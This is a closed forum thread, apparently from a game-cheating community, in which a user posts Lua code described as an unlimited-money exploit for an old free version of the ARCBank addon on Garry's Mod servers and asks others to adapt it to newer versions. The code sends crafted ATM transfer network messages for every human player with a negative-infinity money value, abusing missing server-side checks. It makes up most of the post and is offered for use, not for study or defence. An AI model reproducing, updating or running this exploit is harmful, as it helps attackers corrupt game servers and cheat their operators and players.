SolvedGmod arc bank exploit

Posts 12 of 2 · Page 1 of 1
Gmod arc bank exploit
So previously aritz posted an exploit that gives you unlimited money if the server is using an old free version of arcbank.


[for k,v in pairs(player.GetHumans()) do
timer.Simple(k,function()
local accdata = {}
accdata[ARCBANK_PLAYER] = v:SteamID()
accdata[ARCBANK_NAMETO] = ""
accdata[ARCBANK_NAME] = ""
accdata[ARCBANK_MONEY] = -math.huge
net.Start( "ARCATM_COMM" )
net.WriteEntity(LocalPlayer():GetEyeTrace().Entity )
net.WriteInt(ARCBANK_ATM_TRANSFER,ARCBANK_ATMBITRA TE)
net.WriteTable(accdata)
net.SendToServer()
end)
end]


^ the code. I was wondering if someone could modify it so it would work on newer versions of the mod.

Thanks :* -Fooz
1 week has passed and no further replies have been made by the OP. Assuming solved.

/Closed.
Posts 12 of 2 · Page 1 of 1
This thread is closed for replies.

Similar Threads

Tags for this Thread

None

Need help?